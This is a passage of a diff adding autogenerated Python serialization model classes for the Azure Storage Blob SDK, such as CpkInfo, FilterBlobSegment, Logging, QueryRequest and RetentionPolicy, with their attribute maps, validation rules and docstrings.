provided + if the x-ms-encryption-key header is provided. + :vartype encryption_key_sha256: str + :ivar encryption_algorithm: The algorithm used to produce the encryption key hash. Currently, + the only accepted value is "AES256". Must be provided if the x-ms-encryption-key header is + provided. Possible values include: "None", "AES256". + :vartype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + + _attribute_map = { + 'encryption_key': {'key': 'encryptionKey', 'type': 'str'}, + 'encryption_key_sha256': {'key': 'encryptionKeySha256', 'type': 'str'}, + 'encryption_algorithm': {'key': 'encryptionAlgorithm', 'type': 'str'}, + } + + def __init__( + self, + *, + encryption_key: Optional[str] = None, + encryption_key_sha256: Optional[str] = None, + encryption_algorithm: Optional[Union[str, "EncryptionAlgorithmType"]] = None, + **kwargs + ): + """ + :keyword encryption_key: Optional. Specifies the encryption key to use to encrypt the data + provided in the request. If not specified, encryption is performed with the root account + encryption key. For more information, see Encryption at Rest for Azure Storage Services. + :paramtype encryption_key: str + :keyword encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be + provided if the x-ms-encryption-key header is provided. + :paramtype encryption_key_sha256: str + :keyword encryption_algorithm: The algorithm used to produce the encryption key hash. + Currently, the only accepted value is "AES256". Must be provided if the x-ms-encryption-key + header is provided. Possible values include: "None", "AES256". + :paramtype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + super(CpkInfo, self).__init__(**kwargs) + self.encryption_key = encryption_key + self.encryption_key_sha256 = encryption_key_sha256 + self.encryption_algorithm = encryption_algorithm + + +class CpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :vartype encryption_scope: str + """ + + _attribute_map = { + 'encryption_scope': {'key': 'encryptionScope', 'type': 'str'}, + } + + def __init__( + self, + *, + encryption_scope: Optional[str] = None, + **kwargs + ): + """ + :keyword encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :paramtype encryption_scope: str + """ + super(CpkScopeInfo, self).__init__(**kwargs) + self.encryption_scope = encryption_scope + + +class DelimitedTextConfiguration(msrest.serialization.Model): + """Groups the settings used for interpreting the blob data if the blob is delimited text formatted. + + :ivar column_separator: The string used to separate columns. + :vartype column_separator: str + :ivar field_quote: The string used to quote a specific field. + :vartype field_quote: str + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + :ivar escape_char: The string used as an escape character. + :vartype escape_char: str + :ivar headers_present: Represents whether the data has headers. + :vartype headers_present: bool + """ + + _attribute_map = { + 'column_separator': {'key': 'ColumnSeparator', 'type': 'str', 'xml': {'name': 'ColumnSeparator'}}, + 'field_quote': {'key': 'FieldQuote', 'type': 'str', 'xml': {'name': 'FieldQuote'}}, + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + 'escape_char': {'key': 'EscapeChar', 'type': 'str', 'xml': {'name': 'EscapeChar'}}, + 'headers_present': {'key': 'HeadersPresent', 'type': 'bool', 'xml': {'name': 'HasHeaders'}}, + } + _xml_map = { + 'name': 'DelimitedTextConfiguration' + } + + def __init__( + self, + *, + column_separator: Optional[str] = None, + field_quote: Optional[str] = None, + record_separator: Optional[str] = None, + escape_char: Optional[str] = None, + headers_present: Optional[bool] = None, + **kwargs + ): + """ + :keyword column_separator: The string used to separate columns. + :paramtype column_separator: str + :keyword field_quote: The string used to quote a specific field. + :paramtype field_quote: str + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + :keyword escape_char: The string used as an escape character. + :paramtype escape_char: str + :keyword headers_present: Represents whether the data has headers. + :paramtype headers_present: bool + """ + super(DelimitedTextConfiguration, self).__init__(**kwargs) + self.column_separator = column_separator + self.field_quote = field_quote + self.record_separator = record_separator + self.escape_char = escape_char + self.headers_present = headers_present + + +class FilterBlobItem(msrest.serialization.Model): + """Blob info from a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: str + :ivar container_name: Required. + :vartype container_name: str + :ivar tags: A set of tags. Blob tags. + :vartype tags: ~azure.storage.blob.models.BlobTags + """ + + _validation = { + 'name': {'required': True}, + 'container_name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'container_name': {'key': 'ContainerName', 'type': 'str'}, + 'tags': {'key': 'Tags', 'type': 'BlobTags'}, + } + _xml_map = { + 'name': 'Blob' + } + + def __init__( + self, + *, + name: str, + container_name: str, + tags: Optional["BlobTags"] = None, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword tags: A set of tags. Blob tags. + :paramtype tags: ~azure.storage.blob.models.BlobTags + """ + super(FilterBlobItem, self).__init__(**kwargs) + self.name = name + self.container_name = container_name + self.tags = tags + + +class FilterBlobSegment(msrest.serialization.Model): + """The result of a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar where: Required. + :vartype where: str + :ivar blobs: Required. + :vartype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'where': {'required': True}, + 'blobs': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'where': {'key': 'Where', 'type': 'str'}, + 'blobs': {'key': 'Blobs', 'type': '[FilterBlobItem]', 'xml': {'name': 'Blobs', 'wrapped': True, 'itemsName': 'Blob'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + where: str, + blobs: List["FilterBlobItem"], + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword where: Required. + :paramtype where: str + :keyword blobs: Required. + :paramtype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(FilterBlobSegment, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.where = where + self.blobs = blobs + self.next_marker = next_marker + + +class GeoReplication(msrest.serialization.Model): + """Geo-Replication information for the Secondary Storage Service. + + All required parameters must be populated in order to send to Azure. + + :ivar status: Required. The status of the secondary location. Possible values include: "live", + "bootstrap", "unavailable". + :vartype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :ivar last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :vartype last_sync_time: ~datetime.datetime + """ + + _validation = { + 'status': {'required': True}, + 'last_sync_time': {'required': True}, + } + + _attribute_map = { + 'status': {'key': 'Status', 'type': 'str'}, + 'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123'}, + } + + def __init__( + self, + *, + status: Union[str, "GeoReplicationStatusType"], + last_sync_time: datetime.datetime, + **kwargs + ): + """ + :keyword status: Required. The status of the secondary location. Possible values include: + "live", "bootstrap", "unavailable". + :paramtype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :keyword last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :paramtype last_sync_time: ~datetime.datetime + """ + super(GeoReplication, self).__init__(**kwargs) + self.status = status + self.last_sync_time = last_sync_time + + +class JsonTextConfiguration(msrest.serialization.Model): + """json text configuration. + + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + """ + + _attribute_map = { + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + } + _xml_map = { + 'name': 'JsonTextConfiguration' + } + + def __init__( + self, + *, + record_separator: Optional[str] = None, + **kwargs + ): + """ + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + """ + super(JsonTextConfiguration, self).__init__(**kwargs) + self.record_separator = record_separator + + +class KeyInfo(msrest.serialization.Model): + """Key information. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. The date-time the key is active in ISO 8601 UTC time. + :vartype start: str + :ivar expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :vartype expiry: str + """ + + _validation = { + 'start': {'required': True}, + 'expiry': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + } + + def __init__( + self, + *, + start: str, + expiry: str, + **kwargs + ): + """ + :keyword start: Required. The date-time the key is active in ISO 8601 UTC time. + :paramtype start: str + :keyword expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :paramtype expiry: str + """ + super(KeyInfo, self).__init__(**kwargs) + self.start = start + self.expiry = expiry + + +class LeaseAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar lease_id: If specified, the operation only succeeds if the resource's lease is active and + matches this ID. + :vartype lease_id: str + """ + + _attribute_map = { + 'lease_id': {'key': 'leaseId', 'type': 'str'}, + } + + def __init__( + self, + *, + lease_id: Optional[str] = None, + **kwargs + ): + """ + :keyword lease_id: If specified, the operation only succeeds if the resource's lease is active + and matches this ID. + :paramtype lease_id: str + """ + super(LeaseAccessConditions, self).__init__(**kwargs) + self.lease_id = lease_id + + +class ListBlobsFlatSegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobFlatListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'segment': {'key': 'Segment', 'type': 'BlobFlatListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + container_name: str, + segment: "BlobFlatListSegment", + prefix: Optional[str] = None, + marker: Optional[str] = None, + max_results: Optional[int] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobFlatListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsFlatSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.container_name = container_name + self.prefix = prefix + self.marker = marker + self.max_results = max_results + self.segment = segment + self.next_marker = next_marker + + +class ListBlobsHierarchySegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar delimiter: + :vartype delimiter: str + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'delimiter': {'key': 'Delimiter', 'type': 'str'}, + 'segment': {'key': 'Segment', 'type': 'BlobHierarchyListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + container_name: str, + segment: "BlobHierarchyListSegment", + prefix: Optional[str] = None, + marker: Optional[str] = None, + max_results: Optional[int] = None, + delimiter: Optional[str] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword delimiter: + :paramtype delimiter: str + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsHierarchySegmentResponse, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.container_name = container_name + self.prefix = prefix + self.marker = marker + self.max_results = max_results + self.delimiter = delimiter + self.segment = segment + self.next_marker = next_marker + + +class ListContainersSegmentResponse(msrest.serialization.Model): + """An enumeration of containers. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar container_items: Required. + :vartype container_items: list[~azure.storage.blob.models.ContainerItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_items': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'container_items': {'key': 'ContainerItems', 'type': '[ContainerItem]', 'xml': {'name': 'Containers', 'wrapped': True, 'itemsName': 'Container'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + container_items: List["ContainerItem"], + prefix: Optional[str] = None, + marker: Optional[str] = None, + max_results: Optional[int] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword container_items: Required. + :paramtype container_items: list[~azure.storage.blob.models.ContainerItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListContainersSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.prefix = prefix + self.marker = marker + self.max_results = max_results + self.container_items = container_items + self.next_marker = next_marker + + +class Logging(msrest.serialization.Model): + """Azure Analytics Logging settings. + + All required parameters must be populated in order to send to Azure. + + :ivar version: Required. The version of Storage Analytics to configure. + :vartype version: str + :ivar delete: Required. Indicates whether all delete requests should be logged. + :vartype delete: bool + :ivar read: Required. Indicates whether all read requests should be logged. + :vartype read: bool + :ivar write: Required. Indicates whether all write requests should be logged. + :vartype write: bool + :ivar retention_policy: Required. the retention policy which determines how long the associated + data should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'version': {'required': True}, + 'delete': {'required': True}, + 'read': {'required': True}, + 'write': {'required': True}, + 'retention_policy': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'delete': {'key': 'Delete', 'type': 'bool'}, + 'read': {'key': 'Read', 'type': 'bool'}, + 'write': {'key': 'Write', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + *, + version: str, + delete: bool, + read: bool, + write: bool, + retention_policy: "RetentionPolicy", + **kwargs + ): + """ + :keyword version: Required. The version of Storage Analytics to configure. + :paramtype version: str + :keyword delete: Required. Indicates whether all delete requests should be logged. + :paramtype delete: bool + :keyword read: Required. Indicates whether all read requests should be logged. + :paramtype read: bool + :keyword write: Required. Indicates whether all write requests should be logged. + :paramtype write: bool + :keyword retention_policy: Required. the retention policy which determines how long the + associated data should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Logging, self).__init__(**kwargs) + self.version = version + self.delete = delete + self.read = read + self.write = write + self.retention_policy = retention_policy + + +class Metrics(msrest.serialization.Model): + """a summary of request statistics grouped by API in hour or minute aggregates for blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar version: The version of Storage Analytics to configure. + :vartype version: str + :ivar enabled: Required. Indicates whether metrics are enabled for the Blob service. + :vartype enabled: bool + :ivar include_apis: Indicates whether metrics should generate summary statistics for called API + operations. + :vartype include_apis: bool + :ivar retention_policy: the retention policy which determines how long the associated data + should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'include_apis': {'key': 'IncludeAPIs', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + *, + enabled: bool, + version: Optional[str] = None, + include_apis: Optional[bool] = None, + retention_policy: Optional["RetentionPolicy"] = None, + **kwargs + ): + """ + :keyword version: The version of Storage Analytics to configure. + :paramtype version: str + :keyword enabled: Required. Indicates whether metrics are enabled for the Blob service. + :paramtype enabled: bool + :keyword include_apis: Indicates whether metrics should generate summary statistics for called + API operations. + :paramtype include_apis: bool + :keyword retention_policy: the retention policy which determines how long the associated data + should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Metrics, self).__init__(**kwargs) + self.version = version + self.enabled = enabled + self.include_apis = include_apis + self.retention_policy = retention_policy + + +class ModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :vartype if_modified_since: ~datetime.datetime + :ivar if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :vartype if_unmodified_since: ~datetime.datetime + :ivar if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype if_match: str + :ivar if_none_match: Specify an ETag value to operate only on blobs without a matching value. + :vartype if_none_match: str + :ivar if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a matching + value. + :vartype if_tags: str + """ + + _attribute_map = { + 'if_modified_since': {'key': 'ifModifiedSince', 'type': 'rfc-1123'}, + 'if_unmodified_since': {'key': 'ifUnmodifiedSince', 'type': 'rfc-1123'}, + 'if_match': {'key': 'ifMatch', 'type': 'str'}, + 'if_none_match': {'key': 'ifNoneMatch', 'type': 'str'}, + 'if_tags': {'key': 'ifTags', 'type': 'str'}, + } + + def __init__( + self, + *, + if_modified_since: Optional[datetime.datetime] = None, + if_unmodified_since: Optional[datetime.datetime] = None, + if_match: Optional[str] = None, + if_none_match: Optional[str] = None, + if_tags: Optional[str] = None, + **kwargs + ): + """ + :keyword if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :paramtype if_modified_since: ~datetime.datetime + :keyword if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :paramtype if_unmodified_since: ~datetime.datetime + :keyword if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype if_match: str + :keyword if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :paramtype if_none_match: str + :keyword if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :paramtype if_tags: str + """ + super(ModifiedAccessConditions, self).__init__(**kwargs) + self.if_modified_since = if_modified_since + self.if_unmodified_since = if_unmodified_since + self.if_match = if_match + self.if_none_match = if_none_match + self.if_tags = if_tags + + +class PageList(msrest.serialization.Model): + """the list of pages. + + :ivar page_range: + :vartype page_range: list[~azure.storage.blob.models.PageRange] + :ivar clear_range: + :vartype clear_range: list[~azure.storage.blob.models.ClearRange] + :ivar next_marker: + :vartype next_marker: str + """ + + _attribute_map = { + 'page_range': {'key': 'PageRange', 'type': '[PageRange]'}, + 'clear_range': {'key': 'ClearRange', 'type': '[ClearRange]'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + + def __init__( + self, + *, + page_range: Optional[List["PageRange"]] = None, + clear_range: Optional[List["ClearRange"]] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword page_range: + :paramtype page_range: list[~azure.storage.blob.models.PageRange] + :keyword clear_range: + :paramtype clear_range: list[~azure.storage.blob.models.ClearRange] + :keyword next_marker: + :paramtype next_marker: str + """ + super(PageList, self).__init__(**kwargs) + self.page_range = page_range + self.clear_range = clear_range + self.next_marker = next_marker + + +class PageRange(msrest.serialization.Model): + """PageRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'PageRange' + } + + def __init__( + self, + *, + start: int, + end: int, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. + :paramtype end: long + """ + super(PageRange, self).__init__(**kwargs) + self.start = start + self.end = end + + +class QueryFormat(msrest.serialization.Model): + """QueryFormat. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :vartype type: str or ~azure.storage.blob.models.QueryFormatType + :ivar delimited_text_configuration: Groups the settings used for interpreting the blob data if + the blob is delimited text formatted. + :vartype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :ivar json_text_configuration: json text configuration. + :vartype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :ivar arrow_configuration: Groups the settings used for formatting the response if the response + should be Arrow formatted. + :vartype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :ivar parquet_text_configuration: Any object. + :vartype parquet_text_configuration: any + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str', 'xml': {'name': 'Type'}}, + 'delimited_text_configuration': {'key': 'DelimitedTextConfiguration', 'type': 'DelimitedTextConfiguration'}, + 'json_text_configuration': {'key': 'JsonTextConfiguration', 'type': 'JsonTextConfiguration'}, + 'arrow_configuration': {'key': 'ArrowConfiguration', 'type': 'ArrowConfiguration'}, + 'parquet_text_configuration': {'key': 'ParquetTextConfiguration', 'type': 'object'}, + } + + def __init__( + self, + *, + type: Union[str, "QueryFormatType"], + delimited_text_configuration: Optional["DelimitedTextConfiguration"] = None, + json_text_configuration: Optional["JsonTextConfiguration"] = None, + arrow_configuration: Optional["ArrowConfiguration"] = None, + parquet_text_configuration: Optional[Any] = None, + **kwargs + ): + """ + :keyword type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :paramtype type: str or ~azure.storage.blob.models.QueryFormatType + :keyword delimited_text_configuration: Groups the settings used for interpreting the blob data + if the blob is delimited text formatted. + :paramtype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :keyword json_text_configuration: json text configuration. + :paramtype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :keyword arrow_configuration: Groups the settings used for formatting the response if the + response should be Arrow formatted. + :paramtype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :keyword parquet_text_configuration: Any object. + :paramtype parquet_text_configuration: any + """ + super(QueryFormat, self).__init__(**kwargs) + self.type = type + self.delimited_text_configuration = delimited_text_configuration + self.json_text_configuration = json_text_configuration + self.arrow_configuration = arrow_configuration + self.parquet_text_configuration = parquet_text_configuration + + +class QueryRequest(msrest.serialization.Model): + """Groups the set of query request settings. + + Variables are only populated by the server, and will be ignored when sending a request. + + All required parameters must be populated in order to send to Azure. + + :ivar query_type: Required. The type of the provided query expression. Has constant value: + "SQL". + :vartype query_type: str + :ivar expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :vartype expression: str + :ivar input_serialization: + :vartype input_serialization: ~azure.storage.blob.models.QuerySerialization + :ivar output_serialization: + :vartype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + + _validation = { + 'query_type': {'required': True, 'constant': True}, + 'expression': {'required': True}, + } + + _attribute_map = { + 'query_type': {'key': 'QueryType', 'type': 'str', 'xml': {'name': 'QueryType'}}, + 'expression': {'key': 'Expression', 'type': 'str', 'xml': {'name': 'Expression'}}, + 'input_serialization': {'key': 'InputSerialization', 'type': 'QuerySerialization'}, + 'output_serialization': {'key': 'OutputSerialization', 'type': 'QuerySerialization'}, + } + _xml_map = { + 'name': 'QueryRequest' + } + + query_type = "SQL" + + def __init__( + self, + *, + expression: str, + input_serialization: Optional["QuerySerialization"] = None, + output_serialization: Optional["QuerySerialization"] = None, + **kwargs + ): + """ + :keyword expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :paramtype expression: str + :keyword input_serialization: + :paramtype input_serialization: ~azure.storage.blob.models.QuerySerialization + :keyword output_serialization: + :paramtype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + super(QueryRequest, self).__init__(**kwargs) + self.expression = expression + self.input_serialization = input_serialization + self.output_serialization = output_serialization + + +class QuerySerialization(msrest.serialization.Model): + """QuerySerialization. + + All required parameters must be populated in order to send to Azure. + + :ivar format: Required. + :vartype format: ~azure.storage.blob.models.QueryFormat + """ + + _validation = { + 'format': {'required': True}, + } + + _attribute_map = { + 'format': {'key': 'Format', 'type': 'QueryFormat'}, + } + + def __init__( + self, + *, + format: "QueryFormat", + **kwargs + ): + """ + :keyword format: Required. + :paramtype format: ~azure.storage.blob.models.QueryFormat + """ + super(QuerySerialization, self).__init__(**kwargs) + self.format = format + + +class RetentionPolicy(msrest.serialization.Model): + """the retention policy which determines how long the associated data should persist. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether a retention policy is enabled for the storage + service. + :vartype enabled: bool + :ivar days: Indicates the number of days that metrics or logging or soft-deleted data should be + retained. All data older than this value will be deleted. + :vartype days: int + :ivar allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :vartype allow_permanent_delete: bool + """ + + _validation = { + 'enabled': {'required': True}, + 'days': {'minimum': 1}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'days': {'key': 'Days', 'type': 'int'}, + 'allow_permanent_delete': {'key': 'AllowPermanentDelete', 'type': 'bool'}, + } + + def __init__( + self, + *, + enabled: bool, + days: Optional[int] = None, + allow_permanent_delete: Optional[bool] = None, + **kwargs + ): + """ + :keyword enabled: Required. Indicates whether a retention policy is enabled for the storage + service. + :paramtype enabled: bool + :keyword days: Indicates the number of days that metrics or logging or soft-deleted data should + be retained. All data older than this value will be deleted. + :paramtype days: int + :keyword allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :paramtype allow_permanent_delete: bool + """ + super(RetentionPolicy, self).__init__(**kwargs) + self.enabled = enabled + self.days = days + self.allow_permanent_delete = allow_permanent_delete + + +class SequenceNumberAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on a + blob if it has a sequence number less than or equal to the specified. + :vartype if_sequence_number_less_than_or_equal_to: long + :ivar if_sequence_number_less_than: Specify this header value to operate only on a blob if it + has a sequence number less than the specified. + :vartype if_sequence_number_less_than: long + :ivar if_sequence_number_equal_to: Specify this header value to operate only on a blob if it + has the specified sequence number. + :vartype if_sequence_number_equal_to: long + """ + + _attribute_map = { + 'if_sequence_number_less_than_or_equal_to': {'key': 'ifSequenceNumberLessThanOrEqualTo', 'type': 'long'}, + 'if_sequence_number_less_than': {'key': 'ifSequenceNumberLessThan', 'type': 'long'}, + 'if_sequence_number_equal_to': {'key': 'ifSequenceNumberEqualTo', 'type': 'long'}, + } + + def __init__( + self, + *, + if_sequence_number_less_than_or_equal_to: Optional[int] = None, + if_sequence_number_less_than: Optional[int] = None, + if_sequence_number_equal_to: Optional[int] = None, + **kwargs + ): + """ + :keyword if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on + a blob if it has a sequence number less than or equal to the specified. + :paramtype if_sequence_number_less_than_or_equal_to: long + :keyword if_sequence_number_less_than: Specify this header value to operate only on a blob if + it has a sequence number less than the specified. + :paramtype if_sequence_number_less_than: long + :keyword if_sequence_number_equal_to: Specify this header value to operate only on a blob if it + has the specified sequence number. + :paramtype if_sequence_number_equal_to: long + """ + super(SequenceNumberAccessConditions, self).__init__(**kwargs) + self.if_sequence_number_less_than_or_equal_to = if_sequence_number_less_than_or_equal_to + self.if_sequence_number_less_than = if_sequence_number_less_than + self.if_sequence_number_equal_to = if_sequence_number_equal_to + + +class SignedIdentifier(msrest.serialization.Model): + """signed identifier. + + All required parameters must be populated in order to send to Azure. + + :ivar id: Required. a unique id. + :vartype id: str + :ivar access_policy: An Access policy. + :vartype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + + _validation = { + 'id': 